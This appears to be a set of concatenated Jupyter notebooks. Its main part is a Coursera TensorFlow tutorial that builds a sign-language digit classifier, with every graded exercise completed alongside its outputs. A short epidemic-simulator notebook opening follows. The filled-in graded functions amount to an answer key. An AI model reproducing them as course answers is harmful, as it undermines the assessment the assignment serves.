a * 2 : 1234512345
Orain 12345 balioa <class 'int'> motakoa da
a * 2 : 24690
|
Course_2_Improving_Deep_Neural_Networks/wk3_Tensorflow+Tutorial.ipynb | ###Markdown
TensorFlow Tutorial Welcome to this week's programming assignment. Until now, you've always used numpy to build neural networks. Now we will step you through a deep learning framework that will allow you to build neural networks more easily. Machine learning frameworks like TensorFlow, PaddlePaddle, Torch, Caffe, Keras, and many others can speed up your machine learning development significantly. All of these frameworks also have a lot of documentation, which you should feel free to read. In this assignment, you will learn to do the following in TensorFlow: - Initialize variables- Start your own session- Train algorithms - Implement a Neural Network Programming frameworks can not only shorten your coding time, but sometimes also perform optimizations that speed up your code. 1 - Exploring the Tensorflow Library To start, you will import the library:
###Code
import math
import numpy as np
import h5py
import matplotlib.pyplot as plt
import tensorflow as tf
from tensorflow.python.framework import ops
from tf_utils import load_dataset, random_mini_batches, convert_to_one_hot, predict
%matplotlib inline
np.random.seed(1)
###Output
_____no_output_____
###Markdown
Now that you have imported the library, we will walk you through its different applications. You will start with an example, where we compute for you the loss of one training example. $$loss = \mathcal{L}(\hat{y}, y) = (\hat y^{(i)} - y^{(i)})^2 \tag{1}$$
###Code
y_hat = tf.constant(36, name='y_hat') # Define y_hat constant. Set to 36.
y = tf.constant(39, name='y') # Define y. Set to 39
loss = tf.Variable((y - y_hat)**2, name='loss') # Create a variable for the loss
init = tf.global_variables_initializer() # When init is run later (session.run(init)),
# the loss variable will be initialized and ready to be computed
with tf.Session() as session: # Create a session and print the output
session.run(init) # Initializes the variables
print(session.run(loss)) # Prints the loss
###Output
9
###Markdown
Writing and running programs in TensorFlow has the following steps:1. Create Tensors (variables) that are not yet executed/evaluated. 2. Write operations between those Tensors.3. Initialize your Tensors. 4. Create a Session. 5. Run the Session. This will run the operations you'd written above. Therefore, when we created a variable for the loss, we simply defined the loss as a function of other quantities, but did not evaluate its value. To evaluate it, we had to run `init=tf.global_variables_initializer()`. That initialized the loss variable, and in the last line we were finally able to evaluate the value of `loss` and print its value.Now let us look at an easy example. Run the cell below:
###Code
a = tf.constant(2)
b = tf.constant(10)
c = tf.multiply(a,b)
print(c)
###Output
Tensor("Mul:0", shape=(), dtype=int32)
###Markdown
As expected, you will not see 20! You got a tensor saying that the result is a tensor that does not have the shape attribute, and is of type "int32". All you did was put in the 'computation graph', but you have not run this computation yet. In order to actually multiply the two numbers, you will have to create a session and run it.
###Code
sess = tf.Session()
print(sess.run(c))
###Output
20
###Markdown
Great! To summarize, **remember to initialize your variables, create a session and run the operations inside the session**. Next, you'll also have to know about placeholders. A placeholder is an object whose value you can specify only later. To specify values for a placeholder, you can pass in values by using a "feed dictionary" (`feed_dict` variable). Below, we created a placeholder for x. This allows us to pass in a number later when we run the session.
###Code
# Change the value of x in the feed_dict
x = tf.placeholder(tf.int64, name = 'x')
print(sess.run(2 * x, feed_dict = {x: 3}))
sess.close()
###Output
6
###Markdown
When you first defined `x` you did not have to specify a value for it. A placeholder is simply a variable that you will assign data to only later, when running the session. We say that you **feed data** to these placeholders when running the session. Here's what's happening: When you specify the operations needed for a computation, you are telling TensorFlow how to construct a computation graph. The computation graph can have some placeholders whose values you will specify only later. Finally, when you run the session, you are telling TensorFlow to execute the computation graph. 1.1 - Linear functionLets start this programming exercise by computing the following equation: $Y = WX + b$, where $W$ and $X$ are random matrices and b is a random vector. **Exercise**: Compute $WX + b$ where $W, X$, and $b$ are drawn from a random normal distribution. W is of shape (4, 3), X is (3,1) and b is (4,1). As an example, here is how you would define a constant X that has shape (3,1):```pythonX = tf.constant(np.random.randn(3,1), name = "X")```You might find the following functions helpful: - tf.matmul(..., ...) to do a matrix multiplication- tf.add(..., ...) to do an addition- np.random.randn(...) to initialize randomly
###Code
# GRADED FUNCTION: linear_function
def linear_function():
"""
Implements a linear function:
Initializes W to be a random tensor of shape (4,3)
Initializes X to be a random tensor of shape (3,1)
Initializes b to be a random tensor of shape (4,1)
Returns:
result -- runs the session for Y = WX + b
"""
np.random.seed(1)
### START CODE HERE ### (4 lines of code)
X = tf.constant(np.random.randn(3,1), name = "X")
W = tf.constant(np.random.randn(4,3), name = "W")
b = tf.constant(np.random.randn(4,1), name = "b")
Y = tf.add(tf.matmul(W, X), b)
### END CODE HERE ###
# Create the session using tf.Session() and run it with sess.run(...) on the variable you want to calculate
### START CODE HERE ###
sess = tf.Session()
result = sess.run(Y)
### END CODE HERE ###
# close the session
sess.close()
return result
print( "result = " + str(linear_function()))
###Output
result = [[-2.15657382]
[ 2.95891446]
[-1.08926781]
[-0.84538042]]
###Markdown
*** Expected Output ***: **result**[[-2.15657382] [ 2.95891446] [-1.08926781] [-0.84538042]] 1.2 - Computing the sigmoid Great! You just implemented a linear function. Tensorflow offers a variety of commonly used neural network functions like `tf.sigmoid` and `tf.softmax`. For this exercise lets compute the sigmoid function of an input. You will do this exercise using a placeholder variable `x`. When running the session, you should use the feed dictionary to pass in the input `z`. In this exercise, you will have to (i) create a placeholder `x`, (ii) define the operations needed to compute the sigmoid using `tf.sigmoid`, and then (iii) run the session. ** Exercise **: Implement the sigmoid function below. You should use the following: - `tf.placeholder(tf.float32, name = "...")`- `tf.sigmoid(...)`- `sess.run(..., feed_dict = {x: z})`Note that there are two typical ways to create and use sessions in tensorflow: **Method 1:**```pythonsess = tf.Session() Run the variables initialization (if needed), run the operationsresult = sess.run(..., feed_dict = {...})sess.close() Close the session```**Method 2:**```pythonwith tf.Session() as sess: run the variables initialization (if needed), run the operations result = sess.run(..., feed_dict = {...}) This takes care of closing the session for you :)```
###Code
# GRADED FUNCTION: sigmoid
def sigmoid(z):
"""
Computes the sigmoid of z
Arguments:
z -- input value, scalar or vector
Returns:
results -- the sigmoid of z
"""
### START CODE HERE ### ( approx. 4 lines of code)
# Create a placeholder for x. Name it 'x'.
x = tf.placeholder(tf.float32, name='x')
# compute sigmoid(x)
sigmoid = tf.sigmoid(x)
# Create a session, and run it. Please use the method 2 explained above.
# You should use a feed_dict to pass z's value to x.
with tf.Session() as sess:
# Run session and call the output "result"
result = sess.run(sigmoid, feed_dict={x:z})
### END CODE HERE ###
return result
print ("sigmoid(0) = " + str(sigmoid(0)))
print ("sigmoid(12) = " + str(sigmoid(12)))
###Output
sigmoid(0) = 0.5
sigmoid(12) = 0.999994
###Markdown
*** Expected Output ***: **sigmoid(0)**0.5 **sigmoid(12)**0.999994 **To summarize, you how know how to**:1. Create placeholders2. Specify the computation graph corresponding to operations you want to compute3. Create the session4. Run the session, using a feed dictionary if necessary to specify placeholder variables' values. 1.3 - Computing the CostYou can also use a built-in function to compute the cost of your neural network. So instead of needing to write code to compute this as a function of $a^{[2](i)}$ and $y^{(i)}$ for i=1...m: $$ J = - \frac{1}{m} \sum_{i = 1}^m \large ( \small y^{(i)} \log a^{ [2] (i)} + (1-y^{(i)})\log (1-a^{ [2] (i)} )\large )\small\tag{2}$$you can do it in one line of code in tensorflow!**Exercise**: Implement the cross entropy loss. The function you will use is: - `tf.nn.sigmoid_cross_entropy_with_logits(logits = ..., labels = ...)`Your code should input `z`, compute the sigmoid (to get `a`) and then compute the cross entropy cost $J$. All this can be done using one call to `tf.nn.sigmoid_cross_entropy_with_logits`, which computes$$- \frac{1}{m} \sum_{i = 1}^m \large ( \small y^{(i)} \log \sigma(z^{[2](i)}) + (1-y^{(i)})\log (1-\sigma(z^{[2](i)})\large )\small\tag{2}$$
###Code
# GRADED FUNCTION: cost
def cost(logits, labels):
"""
Computes the cost using the sigmoid cross entropy
Arguments:
logits -- vector containing z, output of the last linear unit (before the final sigmoid activation)
labels -- vector of labels y (1 or 0)
Note: What we've been calling "z" and "y" in this class are respectively called "logits" and "labels"
in the TensorFlow documentation. So logits will feed into z, and labels into y.
Returns:
cost -- runs the session of the cost (formula (2))
"""
### START CODE HERE ###
# Create the placeholders for "logits" (z) and "labels" (y) (approx. 2 lines)
z = tf.placeholder(tf.float32, shape=np.shape(logits))
y = tf.placeholder(tf.float32, shape=np.shape(labels))
# Use the loss function (approx. 1 line)
cost = tf.nn.sigmoid_cross_entropy_with_logits(logits=z, labels=y)
# Create a session (approx. 1 line). See method 1 above.
sess = tf.Session()
# Run the session (approx. 1 line).
cost = sess.run(cost,feed_dict={y:labels,z:logits})
# Close the session (approx. 1 line). See method 1 above.
sess.close()
### END CODE HERE ###
return cost
logits = sigmoid(np.array([0.2,0.4,0.7,0.9]))
cost = cost(logits, np.array([0,0,1,1]))
print ("cost = " + str(cost))
###Output
cost = [ 1.00538719 1.03664088 0.41385433 0.39956614]
###Markdown
** Expected Output** : **cost** [ 1.00538719 1.03664088 0.41385433 0.39956614] 1.4 - Using One Hot encodingsMany times in deep learning you will have a y vector with numbers ranging from 0 to C-1, where C is the number of classes. If C is for example 4, then you might have the following y vector which you will need to convert as follows:This is called a "one hot" encoding, because in the converted representation exactly one element of each column is "hot" (meaning set to 1). To do this conversion in numpy, you might have to write a few lines of code. In tensorflow, you can use one line of code: - tf.one_hot(labels, depth, axis) **Exercise:** Implement the function below to take one vector of labels and the total number of classes $C$, and return the one hot encoding. Use `tf.one_hot()` to do this.
###Code
# GRADED FUNCTION: one_hot_matrix
def one_hot_matrix(labels, C):
"""
Creates a matrix where the i-th row corresponds to the ith class number and the jth column
corresponds to the jth training example. So if example j had a label i. Then entry (i,j)
will be 1.
Arguments:
labels -- vector containing the labels
C -- number of classes, the depth of the one hot dimension
Returns:
one_hot -- one hot matrix
"""
### START CODE HERE ###
# Create a tf.constant equal to C (depth), name it 'C'. (approx. 1 line)
C = tf.constant(C)
# Use tf.one_hot, be careful with the axis (approx. 1 line)
one_hot_matrix = tf.one_hot(labels, C, axis=0)
# Create the session (approx. 1 line)
sess = tf.Session()
# Run the session (approx. 1 line)
one_hot = sess.run(one_hot_matrix)
# Close the session (approx. 1 line). See method 1 above.
sess.close()
### END CODE HERE ###
return one_hot
labels = np.array([1,2,3,0,2,1])
one_hot = one_hot_matrix(labels, C = 4)
print ("one_hot = " + str(one_hot))
###Output
one_hot = [[ 0. 0. 0. 1. 0. 0.]
[ 1. 0. 0. 0. 0. 1.]
[ 0. 1. 0. 0. 1. 0.]
[ 0. 0. 1. 0. 0. 0.]]
###Markdown
**Expected Output**: **one_hot** [[ 0. 0. 0. 1. 0. 0.] [ 1. 0. 0. 0. 0. 1.] [ 0. 1. 0. 0. 1. 0.] [ 0. 0. 1. 0. 0. 0.]] 1.5 - Initialize with zeros and onesNow you will learn how to initialize a vector of zeros and ones. The function you will be calling is `tf.ones()`. To initialize with zeros you could use tf.zeros() instead. These functions take in a shape and return an array of dimension shape full of zeros and ones respectively. **Exercise:** Implement the function below to take in a shape and to return an array (of the shape's dimension of ones). - tf.ones(shape)
###Code
# GRADED FUNCTION: ones
def ones(shape):
"""
Creates an array of ones of dimension shape
Arguments:
shape -- shape of the array you want to create
Returns:
ones -- array containing only ones
"""
### START CODE HERE ###
# Create "ones" tensor using tf.ones(...). (approx. 1 line)
ones = tf.ones(shape)
# Create the session (approx. 1 line)
sess = tf.Session()
# Run the session to compute 'ones' (approx. 1 line)
ones = sess.run(ones)
# Close the session (approx. 1 line). See method 1 above.
sess.close()
### END CODE HERE ###
return ones
print ("ones = " + str(ones([3])))
###Output
ones = [ 1. 1. 1.]
###Markdown
**Expected Output:** **ones** [ 1. 1. 1.] 2 - Building your first neural network in tensorflow In this part of the assignment you will build a neural network using tensorflow. Remember that there are two parts to implement a tensorflow model: - Create the computation graph - Run the graph Let's delve into the problem you'd like to solve! 2.0 - Problem statement: SIGNS Dataset One afternoon, with some friends we decided to teach our computers to decipher sign language. We spent a few hours taking pictures in front of a white wall and came up with the following dataset. It's now your job to build an algorithm that would facilitate communications from a speech-impaired person to someone who doesn't understand sign language. - **Training set**: 1080 pictures (64 by 64 pixels) of signs representing numbers from 0 to 5 (180 pictures per number). - **Test set**: 120 pictures (64 by 64 pixels) of signs representing numbers from 0 to 5 (20 pictures per number). Note that this is a subset of the SIGNS dataset. The complete dataset contains many more signs. Here are examples for each number, and an explanation of how we represent the labels. These are the original pictures, before we lowered the image resolution to 64 by 64 pixels. **Figure 1**: SIGNS dataset Run the following code to load the dataset.
###Code
# Loading the dataset
X_train_orig, Y_train_orig, X_test_orig, Y_test_orig, classes = load_dataset()
###Output
_____no_output_____
###Markdown
Change the index below and run the cell to visualize some examples in the dataset.
###Code
# Example of a picture
index = 0
plt.imshow(X_train_orig[index])
print ("y = " + str(np.squeeze(Y_train_orig[:, index])))
###Output
y = 5
###Markdown
As usual you flatten the image dataset, then normalize it by dividing by 255. On top of that, you will convert each label to a one-hot vector as shown in Figure 1. Run the cell below to do so.
###Code
# Flatten the training and test images
X_train_flatten = X_train_orig.reshape(X_train_orig.shape[0], -1).T
X_test_flatten = X_test_orig.reshape(X_test_orig.shape[0], -1).T
# Normalize image vectors
X_train = X_train_flatten/255.
X_test = X_test_flatten/255.
# Convert training and test labels to one hot matrices
Y_train = convert_to_one_hot(Y_train_orig, 6)
Y_test = convert_to_one_hot(Y_test_orig, 6)
print ("number of training examples = " + str(X_train.shape[1]))
print ("number of test examples = " + str(X_test.shape[1]))
print ("X_train shape: " + str(X_train.shape))
print ("Y_train shape: " + str(Y_train.shape))
print ("X_test shape: " + str(X_test.shape))
print ("Y_test shape: " + str(Y_test.shape))
###Output
number of training examples = 1080
number of test examples = 120
X_train shape: (12288, 1080)
Y_train shape: (6, 1080)
X_test shape: (12288, 120)
Y_test shape: (6, 120)
###Markdown
**Note** that 12288 comes from $64 \times 64 \times 3$. Each image is square, 64 by 64 pixels, and 3 is for the RGB colors. Please make sure all these shapes make sense to you before continuing. **Your goal** is to build an algorithm capable of recognizing a sign with high accuracy. To do so, you are going to build a tensorflow model that is almost the same as one you have previously built in numpy for cat recognition (but now using a softmax output). It is a great occasion to compare your numpy implementation to the tensorflow one. **The model** is *LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SOFTMAX*. The SIGMOID output layer has been converted to a SOFTMAX. A SOFTMAX layer generalizes SIGMOID to when there are more than two classes. 2.1 - Create placeholdersYour first task is to create placeholders for `X` and `Y`. This will allow you to later pass your training data in when you run your session. **Exercise:** Implement the function below to create the placeholders in tensorflow.
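One quick numpy aside before diving into the exercise code below (this is illustration only, not part of the graded function): for two classes, softmax reduces to the sigmoid used earlier, which is the sense in which a SOFTMAX layer generalizes SIGMOID.
```python
import numpy as np

# Quick check: for two classes, softmax of [z, 0] reproduces sigmoid(z).
def softmax(z):
    e = np.exp(z - np.max(z))        # subtract the max for numerical stability
    return e / e.sum()

def sigmoid(z):
    return 1 / (1 + np.exp(-z))

z = 1.3
print(softmax(np.array([z, 0.0]))[0])   # probability assigned to the first class
print(sigmoid(z))                       # same value as above
```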
###Code
# GRADED FUNCTION: create_placeholders
def create_placeholders(n_x, n_y):
"""
Creates the placeholders for the tensorflow session.
Arguments:
n_x -- scalar, size of an image vector (num_px * num_px = 64 * 64 * 3 = 12288)
n_y -- scalar, number of classes (from 0 to 5, so -> 6)
Returns:
X -- placeholder for the data input, of shape [n_x, None] and dtype "float"
Y -- placeholder for the input labels, of shape [n_y, None] and dtype "float"
Tips:
- You will use None because it lets us be flexible on the number of examples used for the placeholders.
In fact, the number of examples during test/train is different.
"""
### START CODE HERE ### (approx. 2 lines)
X = tf.placeholder(dtype=tf.float32, shape=[n_x, None])
Y = tf.placeholder(dtype=tf.float32, shape=[n_y, None])
### END CODE HERE ###
return X, Y
X, Y = create_placeholders(12288, 6)
print ("X = " + str(X))
print ("Y = " + str(Y))
###Output
X = Tensor("Placeholder_2:0", shape=(12288, ?), dtype=float32)
Y = Tensor("Placeholder_3:0", shape=(6, ?), dtype=float32)
###Markdown
**Expected Output**: **X** Tensor("Placeholder_1:0", shape=(12288, ?), dtype=float32) (not necessarily Placeholder_1) **Y** Tensor("Placeholder_2:0", shape=(6, ?), dtype=float32) (not necessarily Placeholder_2) 2.2 - Initializing the parameters Your second task is to initialize the parameters in tensorflow. **Exercise:** Implement the function below to initialize the parameters in tensorflow. You are going to use Xavier Initialization for weights and Zero Initialization for biases. The shapes are given below. As an example, to help you, for W1 and b1 you could use:
```python
W1 = tf.get_variable("W1", [25,12288], initializer = tf.contrib.layers.xavier_initializer(seed = 1))
b1 = tf.get_variable("b1", [25,1], initializer = tf.zeros_initializer())
```
Please use `seed = 1` to make sure your results match ours.
###Code
# GRADED FUNCTION: initialize_parameters
def initialize_parameters():
"""
Initializes parameters to build a neural network with tensorflow. The shapes are:
W1 : [25, 12288]
b1 : [25, 1]
W2 : [12, 25]
b2 : [12, 1]
W3 : [6, 12]
b3 : [6, 1]
Returns:
parameters -- a dictionary of tensors containing W1, b1, W2, b2, W3, b3
"""
tf.set_random_seed(1) # so that your "random" numbers match ours
### START CODE HERE ### (approx. 6 lines of code)
W1 = tf.get_variable('W1', [25, 12288], initializer = tf.contrib.layers.xavier_initializer(seed = 1))
b1 = tf.get_variable('b1', [25, 1], initializer = tf.zeros_initializer())
W2 = tf.get_variable('W2', [12, 25], initializer = tf.contrib.layers.xavier_initializer(seed = 1))
b2 = tf.get_variable('b2', [12, 1], initializer = tf.zeros_initializer())
W3 = tf.get_variable('W3', [6, 12], initializer = tf.contrib.layers.xavier_initializer(seed = 1))
b3 = tf.get_variable('b3', [6, 1], initializer = tf.zeros_initializer())
### END CODE HERE ###
parameters = {"W1": W1,
"b1": b1,
"W2": W2,
"b2": b2,
"W3": W3,
"b3": b3}
return parameters
tf.reset_default_graph()
with tf.Session() as sess:
parameters = initialize_parameters()
print("W1 = " + str(parameters["W1"]))
print("b1 = " + str(parameters["b1"]))
print("W2 = " + str(parameters["W2"]))
print("b2 = " + str(parameters["b2"]))
###Output
W1 = <tf.Variable 'W1:0' shape=(25, 12288) dtype=float32_ref>
b1 = <tf.Variable 'b1:0' shape=(25, 1) dtype=float32_ref>
W2 = <tf.Variable 'W2:0' shape=(12, 25) dtype=float32_ref>
b2 = <tf.Variable 'b2:0' shape=(12, 1) dtype=float32_ref>
###Markdown
**Expected Output**: **W1** **b1** **W2** **b2** As expected, the parameters haven't been evaluated yet. 2.3 - Forward propagation in tensorflow You will now implement the forward propagation module in tensorflow. The function will take in a dictionary of parameters and it will complete the forward pass. The functions you will be using are: - `tf.add(...,...)` to do an addition- `tf.matmul(...,...)` to do a matrix multiplication- `tf.nn.relu(...)` to apply the ReLU activation**Question:** Implement the forward pass of the neural network. We commented for you the numpy equivalents so that you can compare the tensorflow implementation to numpy. It is important to note that the forward propagation stops at `z3`. The reason is that in tensorflow the last linear layer output is given as input to the function computing the loss. Therefore, you don't need `a3`!
###Code
# GRADED FUNCTION: forward_propagation
def forward_propagation(X, parameters):
"""
Implements the forward propagation for the model: LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SOFTMAX
Arguments:
X -- input dataset placeholder, of shape (input size, number of examples)
parameters -- python dictionary containing your parameters "W1", "b1", "W2", "b2", "W3", "b3"
the shapes are given in initialize_parameters
Returns:
Z3 -- the output of the last LINEAR unit
"""
# Retrieve the parameters from the dictionary "parameters"
W1 = parameters['W1']
b1 = parameters['b1']
W2 = parameters['W2']
b2 = parameters['b2']
W3 = parameters['W3']
b3 = parameters['b3']
### START CODE HERE ### (approx. 5 lines) # Numpy Equivalents:
Z1 = tf.add(tf.matmul(W1, X), b1) # Z1 = np.dot(W1, X) + b1
A1 = tf.nn.relu(Z1) # A1 = relu(Z1)
Z2 = tf.add(tf.matmul(W2, A1), b2) # Z2 = np.dot(W2, a1) + b2
A2 = tf.nn.relu(Z2) # A2 = relu(Z2)
Z3 = tf.add(tf.matmul(W3, A2), b3) # Z3 = np.dot(W3,A2) + b3
### END CODE HERE ###
return Z3
tf.reset_default_graph()
with tf.Session() as sess:
X, Y = create_placeholders(12288, 6)
parameters = initialize_parameters()
Z3 = forward_propagation(X, parameters)
print("Z3 = " + str(Z3))
###Output
Z3 = Tensor("Add_2:0", shape=(6, ?), dtype=float32)
###Markdown
**Expected Output**: **Z3** Tensor("Add_2:0", shape=(6, ?), dtype=float32) You may have noticed that the forward propagation doesn't output any cache. You will understand why below, when we get to backpropagation. 2.4 Compute cost As seen before, it is very easy to compute the cost using:
```python
tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits = ..., labels = ...))
```
**Question**: Implement the cost function below. - It is important to know that the "`logits`" and "`labels`" inputs of `tf.nn.softmax_cross_entropy_with_logits` are expected to be of shape (number of examples, num_classes). We have thus transposed Z3 and Y for you. - Besides, `tf.reduce_mean` basically takes the mean over the examples.
###Code
# GRADED FUNCTION: compute_cost
def compute_cost(Z3, Y):
"""
Computes the cost
Arguments:
Z3 -- output of forward propagation (output of the last LINEAR unit), of shape (6, number of examples)
Y -- "true" labels vector placeholder, same shape as Z3
Returns:
cost - Tensor of the cost function
"""
# to fit the tensorflow requirement for tf.nn.softmax_cross_entropy_with_logits(...,...)
logits = tf.transpose(Z3)
labels = tf.transpose(Y)
### START CODE HERE ### (1 line of code)
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=labels))
### END CODE HERE ###
return cost
tf.reset_default_graph()
with tf.Session() as sess:
X, Y = create_placeholders(12288, 6)
parameters = initialize_parameters()
Z3 = forward_propagation(X, parameters)
cost = compute_cost(Z3, Y)
print("cost = " + str(cost))
###Output
cost = Tensor("Mean:0", shape=(), dtype=float32)
###Markdown
**Expected Output**: **cost** Tensor("Mean:0", shape=(), dtype=float32) 2.5 - Backward propagation & parameter updates This is where you become grateful to programming frameworks. All of the backpropagation and the parameter updates are taken care of in 1 line of code, and it is very easy to incorporate this line in the model. After you compute the cost function, you will create an "`optimizer`" object. You have to call this object along with the cost when running the tf.session. When called, it will perform an optimization on the given cost with the chosen method and learning rate. For instance, for gradient descent the optimizer would be:
```python
optimizer = tf.train.GradientDescentOptimizer(learning_rate = learning_rate).minimize(cost)
```
To make the optimization you would do:
```python
_ , c = sess.run([optimizer, cost], feed_dict={X: minibatch_X, Y: minibatch_Y})
```
This computes the backpropagation by passing through the tensorflow graph in reverse order, from cost to inputs. **Note** When coding, we often use `_` as a "throwaway" variable to store values that we won't need to use later. Here, `_` takes on the evaluated value of `optimizer`, which we don't need (and `c` takes the value of the `cost` variable). 2.6 - Building the model Now, you will bring it all together! **Exercise:** Implement the model. You will be calling the functions you had previously implemented.
###Code
def model(X_train, Y_train, X_test, Y_test, learning_rate = 0.0001,
num_epochs = 1500, minibatch_size = 32, print_cost = True):
"""
Implements a three-layer tensorflow neural network: LINEAR->RELU->LINEAR->RELU->LINEAR->SOFTMAX.
Arguments:
X_train -- training set, of shape (input size = 12288, number of training examples = 1080)
Y_train -- training labels, of shape (output size = 6, number of training examples = 1080)
X_test -- test set, of shape (input size = 12288, number of test examples = 120)
Y_test -- test labels, of shape (output size = 6, number of test examples = 120)
learning_rate -- learning rate of the optimization
num_epochs -- number of epochs of the optimization loop
minibatch_size -- size of a minibatch
print_cost -- True to print the cost every 100 epochs
Returns:
parameters -- parameters learnt by the model. They can then be used to predict.
"""
ops.reset_default_graph() # to be able to rerun the model without overwriting tf variables
tf.set_random_seed(1) # to keep consistent results
seed = 3 # to keep consistent results
(n_x, m) = X_train.shape # (n_x: input size, m : number of examples in the train set)
n_y = Y_train.shape[0] # n_y : output size
costs = [] # To keep track of the cost
# Create Placeholders of shape (n_x, n_y)
### START CODE HERE ### (1 line)
X, Y = create_placeholders(n_x, n_y)
### END CODE HERE ###
# Initialize parameters
### START CODE HERE ### (1 line)
parameters = initialize_parameters()
### END CODE HERE ###
# Forward propagation: Build the forward propagation in the tensorflow graph
### START CODE HERE ### (1 line)
Z3 = forward_propagation(X, parameters)
### END CODE HERE ###
# Cost function: Add cost function to tensorflow graph
### START CODE HERE ### (1 line)
cost = compute_cost(Z3, Y)
### END CODE HERE ###
# Backpropagation: Define the tensorflow optimizer. Use an AdamOptimizer.
### START CODE HERE ### (1 line)
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate,
beta1=0.9,
beta2=0.999,
epsilon=1e-08).minimize(cost)
### END CODE HERE ###
# Initialize all the variables
init = tf.global_variables_initializer()
# Start the session to compute the tensorflow graph
with tf.Session() as sess:
# Run the initialization
sess.run(init)
# Do the training loop
for epoch in range(num_epochs):
epoch_cost = 0. # Defines a cost related to an epoch
num_minibatches = int(m / minibatch_size) # number of minibatches of size minibatch_size in the train set
seed = seed + 1
minibatches = random_mini_batches(X_train, Y_train, minibatch_size, seed)
for minibatch in minibatches:
# Select a minibatch
(minibatch_X, minibatch_Y) = minibatch
# IMPORTANT: The line that runs the graph on a minibatch.
# Run the session to execute the "optimizer" and the "cost", the feedict should contain a minibatch for (X,Y).
### START CODE HERE ### (1 line)
_ , minibatch_cost = sess.run([optimizer, cost], feed_dict={X: minibatch_X, Y: minibatch_Y})
### END CODE HERE ###
epoch_cost += minibatch_cost / num_minibatches
# Print the cost every epoch
if print_cost == True and epoch % 100 == 0:
print ("Cost after epoch %i: %f" % (epoch, epoch_cost))
if print_cost == True and epoch % 5 == 0:
costs.append(epoch_cost)
# plot the cost
plt.plot(np.squeeze(costs))
plt.ylabel('cost')
plt.xlabel('iterations (per tens)')
plt.title("Learning rate =" + str(learning_rate))
plt.show()
# lets save the parameters in a variable
parameters = sess.run(parameters)
print ("Parameters have been trained!")
# Calculate the correct predictions
correct_prediction = tf.equal(tf.argmax(Z3), tf.argmax(Y))
# Calculate accuracy on the test set
accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float"))
print ("Train Accuracy:", accuracy.eval({X: X_train, Y: Y_train}))
print ("Test Accuracy:", accuracy.eval({X: X_test, Y: Y_test}))
return parameters
###Output
_____no_output_____
###Markdown
Run the following cell to train your model! On our machine it takes about 5 minutes. Your "Cost after epoch 100" should be 1.016458. If it's not, don't waste time; interrupt the training by clicking on the square (⬛) in the upper bar of the notebook, and try to correct your code. If it is the correct cost, take a break and come back in 5 minutes!
###Code
parameters = model(X_train, Y_train, X_test, Y_test)
###Output
Cost after epoch 0: 1.855702
Cost after epoch 100: 1.016458
Cost after epoch 200: 0.733102
Cost after epoch 300: 0.572940
Cost after epoch 400: 0.468774
Cost after epoch 500: 0.381021
Cost after epoch 600: 0.313822
Cost after epoch 700: 0.254158
Cost after epoch 800: 0.203829
Cost after epoch 900: 0.166421
Cost after epoch 1000: 0.141486
Cost after epoch 1100: 0.107580
Cost after epoch 1200: 0.086270
Cost after epoch 1300: 0.059371
Cost after epoch 1400: 0.052228
###Markdown
**Expected Output**: **Train Accuracy** 0.999074 **Test Accuracy** 0.716667 Amazing, your algorithm can recognize a sign representing a figure between 0 and 5 with 71.7% accuracy.**Insights**:- Your model seems big enough to fit the training set well. However, given the difference between train and test accuracy, you could try to add L2 or dropout regularization to reduce overfitting. - Think about the session as a block of code to train the model. Each time you run the session on a minibatch, it trains the parameters. In total you have run the session a large number of times (1500 epochs) until you obtained well trained parameters. 2.7 - Test with your own image (optional / ungraded exercise)Congratulations on finishing this assignment. You can now take a picture of your hand and see the output of your model. To do that: 1. Click on "File" in the upper bar of this notebook, then click "Open" to go on your Coursera Hub. 2. Add your image to this Jupyter Notebook's directory, in the "images" folder 3. Write your image's name in the following code 4. Run the code and check if the algorithm is right!
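Before trying your own image, a brief aside on the regularization insight above. The sketch below shows one way L2 regularization could be bolted onto the cost in this TensorFlow 1.x setup; it is not part of the original assignment, `lambd` is an assumed hyperparameter, and penalizing only the weight matrices (not the biases) is a common convention rather than something the notebook prescribes.
```python
import tensorflow as tf

# Sketch only (TF 1.x API, as used throughout this notebook): softmax cross-entropy cost
# plus an L2 penalty on the weight matrices. `lambd` is an assumed hyperparameter.
def compute_cost_with_l2(Z3, Y, parameters, lambd=0.01):
    logits = tf.transpose(Z3)
    labels = tf.transpose(Y)
    cross_entropy = tf.reduce_mean(
        tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=labels))
    # tf.nn.l2_loss(W) returns sum(W ** 2) / 2 for a single tensor
    l2_penalty = lambd * (tf.nn.l2_loss(parameters["W1"])
                          + tf.nn.l2_loss(parameters["W2"])
                          + tf.nn.l2_loss(parameters["W3"]))
    return cross_entropy + l2_penalty
```
Swapping this in for `compute_cost` inside `model` and tuning `lambd` would be one way to probe whether regularization narrows the train/test gap.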
###Code
import scipy
from PIL import Image
from scipy import ndimage
## START CODE HERE ## (PUT YOUR IMAGE NAME)
my_image = "thumbs_up.jpg"
## END CODE HERE ##
# We preprocess your image to fit your algorithm.
fname = "images/" + my_image
image = np.array(ndimage.imread(fname, flatten=False))
my_image = scipy.misc.imresize(image, size=(64,64)).reshape((1, 64*64*3)).T
my_image_prediction = predict(my_image, parameters)
plt.imshow(image)
print("Your algorithm predicts: y = " + str(np.squeeze(my_image_prediction)))
###Output
Your algorithm predicts: y = 3
|
share/codit/notebooks/overview.ipynb | ###Markdown
We begin with boilerplate:
###Code
%matplotlib inline
import matplotlib.pyplot as plt
plt.rcParams["figure.figsize"] = [12, 5]
%load_ext autoreload
%autoreload 2
import numpy as np
import random
import pandas as pd
import os
import sys
import logging
logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s', level=logging.INFO)
###Output
_____no_output_____
###Markdown
Covid epidemic simulator
###Code
from codit.disease import Covid
from codit.outbreak import Outbreak
from codit.population.networks.city import CityPopulation
from codit.population.covid import PersonCovid
import codit.society as society
import codit.config
###Output
_____no_output_____
###Markdown
Baseline config of the simulation
###Code
codit.config.print_baseline_config()
###Output
CROSS_IMMUNITY {'other': {'other'}, 'SARS-CoV-2': {'SARS-CoV-2', 'B.1.1.7'}, 'B.1.1.7': {'SARS-CoV-2', 'B.1.1.7'}}
DAILY_TEST_CAPACITY_PER_HEAD 0.0075
DAYS_BEFORE_INFECTIOUS 4
DAYS_INFECTIOUS_TO_SYMPTOMS 2
